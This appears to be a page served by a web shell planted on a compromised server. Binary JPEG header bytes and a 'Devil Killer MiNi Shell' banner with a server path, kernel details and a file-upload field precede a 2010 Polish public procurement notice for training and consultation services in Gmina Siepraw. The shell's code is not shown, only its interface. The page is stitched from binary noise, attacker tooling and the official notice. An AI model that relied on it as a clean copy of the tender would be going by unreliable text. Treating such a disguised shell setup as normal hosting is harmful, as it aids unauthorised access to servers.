JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100722/221242-N-2010.html

<p class="kh_header"><b>Siepraw: Usługi w zakresie szkoleń dla 16 osób zakwalifikowanych do udziału w projekcie systemowym Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw</b><br>
<b>Numer ogłoszenia: 221242 - 2010; data zamieszczenia: 22.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Sieprawiu , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 12 274 63 03, faks 12 37 21 806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie szkoleń dla 16 osób zakwalifikowanych do udziału w projekcie systemowym Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  warsztatów oraz konsultacji indywidualnych w ramach projektu systemowego Działania na rzecz aktywizacji społecznej i  zawodowej w Gminie Siepraw realizowanego przez Gminę Siepraw Gminny Ośrodek Pomocy Społecznej w Sieprawiu, w ramach Priorytetu VII Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej, Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, który obejmuje składa się z dwóch części, a w szczególności:
CZĘŚĆ 1:
1.	Indywidualne konsultacje z psychologiem dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 48 godz. łącznie (po 3 godz. na 1 osobę) w zakresie pomocy w identyfikowaniu istotnych przyczyn braku aktywności do poprawy sytuacji bytowej, motywacji do zmiany swojej sytuacji społecznej i zawodowej.
2.	Indywidualne konsultacje z doradcą zawodowym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 32 godz. łącznie (po 2 godz. na 1 osobę) w zakresie stworzenia indywidualnych planów rozwoju zawodowego 
3.	Indywidualne konsultacje z brokerem edukacyjnym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 32 godz. łącznie (po 2 godz. na 1 osobę) w zakresie pomocy w doborze odpowiednich szkoleń zawodowych dostosowanych do indywidualnych potrzeb i możliwości każdej osoby.
4.	Indywidualne konsultacje z doradcą prawnym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 16 godz. łącznie (po 1 godz. na 1 osobę) w zakresie przysługujących praw na rynku pracy
5.	Warsztaty pt. Szukam pracy z zakresu aktywnego poruszania się po rynku pracy dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Dwa moduły po  4 godz.
            Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
          - umiejętność poszukiwania pracy, źródła informacji o wolnych stanowiskach pracy, 
          - umiejętność przygotowania dokumentów aplikacyjnych,
          - umiejętność negocjacji i ustalania warunków zatrudnienia,
          - symulacja rozmowy kwalifikacyjnej,
         -   rodzaje rekrutacji (rozmowa telefoniczna, wolontariat, okres próbny itp.)
6.	Warsztaty pt. Skutecznie mówię i słucham z zakresu treningu umiejetności komunikacyjnych dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Dwa moduły po  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- umiejętności mówienia tak aby nas słyszano,
- umiejętności słuchania tak aby rozumieć innych,
- umiejętności aktywnego słuchania i udzielania informacji zwrotnych,
- asertywność czyli jak walczyć o swoje nie zrażając sobie otoczenia
7.	Warsztaty pt. Skutecznie działam z zakresu treningu umiejętności społecznych dotyczący sposobów reagowania w sytuacjach życia codziennego i sytuacjach trudnych dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Cztery moduły po  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- skuteczne i nieskuteczne strategie postępowania w życiu codziennym,
-  umiejętności radzenia sobie w sytuacjach trudnych, nietypowych i kryzysowych,
- analiza własnych postaw życiowych,
- autoprezentacja i savoir -vivre na co dzień,
- umiejętność radzenia sobie z własnymi trudnymi emocjami,
- asertywność zamiast agresji czyli jak osiągnąć cel nie raniąc innych.
8.	Warsztaty pt. Co zyskam co stracę z zakresu analizy motywacji do różnych form aktywności dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Jeden moduł  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
-  w stronę samodzielności. Jakie korzyści mogę stracić i co w zamian za to mogę zyskać
- analiza zysków i strat konkretnych grup odbiorców
9.	Warsztaty pt. Wiem na co mnie stać z zakresu rozwoju potencjału osobbistego w kontekście podejmowania aktywności zawodowej dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Cztery moduły 4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- umiejętności wyodrębnienia własnych cech i ich opisywania,
- umiejętności jak słabości mogą stać się naszą silna stroną,
- analiza umiejętności, zainteresowań oraz możliwości zdrowotnych uczestników i dopasowywaniu odpowiednich zawodów
- umiejętności zarządzania czasem i organizacji dnia jako cecha pomocna przy aktywizacji zawodowej
- umiejętności przekazywania informacji o nas innym tak aby osiągnąć cel
- umiejętności opanowywania stresu i lęku przed oceną w trakcie mówienia o sobie
- poznanie potęgi mowy ciała i umiejętności jak ją wykorzystywać

CZĘŚĆ 2:
Kurs podstawowej obsługi komputera dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw o łącznej ilości 24 godz. Moduły szkoleniowe nie dłuższe niż 4 godziny.
Kurs zawiera tematykę związaną z następującymi zagadnieniami:
- obsługa komputera (logowanie do systemu operacyjnego, tworzenie nowych kont użytkowników, kopiowanie, przenoszenie, zarządzanie plikami i folderami)
- użytkowanie internetu,
- obsługa programów biurowych MS Word, MS Excel, MS Power Point.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp. Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenie, które ma dostarczyć Wykonawca zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla Części 1: pod uwagę będą brane oferty, w których wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prowadził 2 usługi szkolenie, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia i wartości pojedynczej usługi nie mniej niż 7,0 tys. zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane należycie. Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenie, które ma dostarczyć Wykonawca zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp. Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenie, które ma dostarczyć Wykonawca zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla Części 1 - pod uwagę będą brane oferty, w których wykonawca wykaże, że dysponuje osobami zdolnymi, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacji o podstawie do dysponowania tymi osobami, w tym:
- 1 psychologa z wykształceniem wyższym magisterskim,
- 1 doradcę prawnego, 
- 1 doradcę zawodowego, 
- 1 brokera edukacyjnego.
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie, pod warunkiem, że osoba ta spełnia łącznie wymagania dla każdej z łączonych funkcji.Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenie, które ma dostarczyć Wykonawca zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp. Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenie, które ma dostarczyć Wykonawca zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertow
2) Wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom. 
3) pełnomocnictwo podpisane przez osobę (osoby) upoważnione do dokonywania czynności prawnych w imieniu Wykonawcy, w przypadku gdy Wykonawca wyznaczył osobę mającą reprezentować go w postępowaniu o zamówienie publiczne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian do niniejszej umowy w następującym zakresie:
1) zmniejszenie liczby uczestników projektu szkoleń kursów czy warsztatów z równoczesnym pomniejszeniem łącznego wynagrodzenia.

2) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:

a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b) działania siły wyższej, uniemożliwiającej wykonanie usługi w określonym pierwotnie terminie, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi grożącego powstaniem szkody w znacznych rozmiarach,
c) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w tym udzielenie w trakcie realizacji umowy zamówień dodatkowych i lub uzupełniających, związanych z realizacją zmówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
d) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego,
e) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.

3) powierzenie Podwykonawcy określonego zakresu robót (zmiana zakresu robót) na skutek którejkolwiek z okoliczności wskazanych w pkt. 1, 2 i 3 niniejszego ustępu - i pod warunkiem, że Zamawiający nie zastrzegł, iż dana część zamówienia nie może być powierzona Podwykonawcom,

4) zmiana przedstawicieli stron, w tym osób wykonujących zamówenie - w przypadku niemożności pełnienia przez nich powierzonych funkcji (np. zdarzenia losowe, zmiana pracy, rezygnacja).

5)Wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.

6) Zamawiający zastrzega sobie możliwość zmian w harmonogramie szkoleń kursów konsultacji 

7) Zamawiający zastrzega sobie zamianę uczestników szkolenia.

8) Zamawiający zastrzega sobie możlwość rezygnacji z danego szkolenia/kursu z równoczesnym pomniejszeniem łącznego wynagrodzenia.


2. Zmiany umowy przewidziane w pkt. 3 ninijeszego paragrafu dopuszczalne są na następujących warunkach:

1) ad pkt 1) - zmniejszenie liczby uczestników projektu na wskutek np. rezygnacji, zdarzeń losowych z równoczesnym proporcjonalnym zmniejszeniem łącznego wynagrodzenia.

2) ad pkt 2):
- lit. a) - w zakresie uzasadnionego interesu Zamawiającego,
- lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
- lit. c), d), e) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy,

3) ad pkt. 3, 5 na każdym etapie trwania umowy, na wniosek Wykonawcy za zgodą Zamawiającego.
4) ad pkt. 4 na każdym etapie trwania umowy, na wniosek każdej ze stron za zgodą drugiej strony umowy.
5) ad. pkt. 6 na każdym etapie trwania umowy w wyniku ustaleń/nakazów Instytucji Wdrażającej wynikających z ewentualnych zmian w Projekcie systemowym pn. Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw lub na wskutek siły wyższej, której z pewnością nie można było przewidzieć albo z przyczyn organizacyjnych.
6) ad. pkt. 7 na każdym etapie trwania umowy na wskutek rezygnacji, zdarzeń losowych itp.
7) ad. pkt. 8 na każdym etapie trwania umowy na wskutek braku uczestników projektu, rezygnacji uczestników, modyfikacji przez Instytucję Wdrażającą przedmiotu umowy o dofinansowanie w zakresie szkolenia kursu warsztatów konsultacji.

3. Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.
Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Osrodek Pomocy Społecznej w Sieprawiu 32-447 Siepraw 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 10:00, miejsce: Gminny Osrodek Pomocy Społecznej w Sieprawiu 32-447 Siepraw 1, pokój nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu pn.: Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Priorytetu VII. Promocja integracji społecznej; Działania  7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie szkoleń dla 16 osób zakwalifikowanych do udziału w projekcie systemowym Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  warsztatów oraz konsultacji indywidualnych w ramach projektu systemowego Działania na rzecz aktywizacji społecznej i  zawodowej w Gminie Siepraw realizowanego przez Gminę SieprawGminny Ośrodek Pomocy Społecznej w Sieprawiu, w ramach Priorytetu VII Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej, Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, który obejmuje składa się z dwóch części, a w szczególności:
CZĘŚĆ 1:
1.	Indywidualne konsultacje z psychologiem dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 48 godz. łącznie (po 3 godz. na 1 osobę) w zakresie pomocy w identyfikowaniu istotnych przyczyn braku aktywności do poprawy sytuacji bytowej, motywacji do zmiany swojej sytuacji społecznej i zawodowej.
2.	Indywidualne konsultacje z doradcą zawodowym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 32 godz. łącznie (po 2 godz. na 1 osobę) w zakresie stworzenia indywidualnych planów rozwoju zawodowego 
3.	Indywidualne konsultacje z brokerem edukacyjnym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 32 godz. łącznie (po 2 godz. na 1 osobę) w zakresie pomocy w doborze odpowiednich szkoleń zawodowych dostosowanych do indywidualnych potrzeb i możliwości każdej osoby.
4.	Indywidualne konsultacje z doradcą prawnym dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw w wymiarze 16 godz. łącznie (po 1 godz. na 1 osobę) w zakresie przysługujących praw na rynku pracy
